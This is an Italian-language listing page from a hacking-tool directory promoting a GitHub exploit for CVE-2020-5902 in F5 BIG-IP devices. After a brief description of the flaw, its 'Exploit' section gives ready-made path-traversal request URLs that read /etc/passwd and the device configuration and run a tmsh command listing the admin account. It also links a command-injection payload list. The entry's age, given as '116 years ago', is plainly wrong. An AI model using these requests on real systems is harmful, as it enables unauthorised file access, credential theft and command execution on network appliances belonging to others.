Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RCE-CVE-2020-5902 — BIG-IP F5 Esecuzione remota di codice | Kitploit
Strumenti/GitHubGitHub/jsec1337/rce-cve-2020-5902
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubjsec1337/rce-cve-2020-5902

RCE-CVE-2020-5902

BIG-IP F5 Esecuzione remota di codice

Vedi Repository
116 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RCE-CVE-2020-5902

BIG-IP F5 Esecuzione di codice remoto

Descrizione

Questi attacchi hanno come bersaglio BIG-IP, un dispositivo di rete multiuso prodotto da F5 Networks. I dispositivi BIG-IP possono essere configurati per funzionare come sistemi di traffic shaping, bilanciatori di carico, firewall, gateway di accesso, limitatori di velocità o middleware SSL.

Mercoledì F5 Networks ha pubblicato delle patch e ha rilasciato un advisory di sicurezza riguardante una vulnerabilità di "esecuzione di codice remoto" nei dispositivi BIG-IP.

F5 ha dichiarato che la vulnerabilità, tracciata come CVE-2020-5902, potrebbe consentire agli aggressori di assumere il pieno controllo dei sistemi non patchati accessibili su internet.

root@kitploit:~
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability             : Remote Code Execution (RCE) 
Score CVE                 : 10/10

Exploit

root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Scarica lo strumento

Verifica NMAP

Payload RCE

https://github.com/payloadbox/command-injection-payload-list

Riferimenti

https://twitter.com/Nep_1337_1998/status/1279610946864820225

https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/